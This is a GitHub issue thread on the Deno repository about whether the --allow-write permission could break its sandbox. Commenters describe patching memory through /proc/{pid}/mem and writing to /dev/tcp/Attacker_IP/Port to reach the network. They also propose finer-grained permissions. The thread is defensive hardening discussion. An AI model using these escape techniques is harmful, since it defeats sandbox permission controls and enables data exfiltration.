### ISSUE TITLE
Security concern

### ISSUE THREAD

**Issue by elderapo** [denoland/deno#720]
I think that using `--allow-write` flag on unix systems with sudo privileges might make deno not sandboxed anymore. What I mean by that is it might allow gaining access `--allow-net` or any other flag by just enabling `--allow-write`.

`--allow-write` can give you read/write access to process memory `/proc/{pid}/mem`. With this it's possible to patch self memory to "disable" flag checks etc.

I am pretty sure `/proc/{pid}/mem` requires sudo privileges so it's only going to be a case if user runs deno as root.

**Comment by ry** [comment]
Good point. We should probably block writing to /proc...

**Comment by Meyhem** [comment]
Also in Bash on *Nix systems /dev is interesting as one can use e.g. /dev/tcp/8.8.8.8/80 to write to TCP.
**write(/dev/tcp/Attacker_IP/Port) **
Therefore --allow-write can write net even easier.
[More here](https://securityreliks.wordpress.com/2010/08/20/devtcp-as-a-weapon/)

Is --allow-net, --allow-write granular enough to provide sandbox ? 
Random toughts: 
--allow-write /access/only/to/this/**folder**
--allow-net tcp://10.0.0.1:8080  allow only this tcp endpoint

**Comment by kevinkassimo** [comment]
Random simple thoughts: if we are supposed to support child process in deno some day, --allow-write will also allow program to write any code in files and execute with permissions deno could not monitor

**Comment by F001** [comment]
My random thoughts: we'd better provide a config file for users to fine control these resources.
```
deno --config deno.json
```
```json
// deno.json file
"file" : {
  "default" : "prompt",
  "mounts" : [
     { "mode": "r+", "source": "/home/name/dir", "destination" : "/images" }
  ]
}
"net" : {
    ...
}
...
```

**Comment by ry** [comment]
We have whitelists for permissions now, so I think that solves this issue.
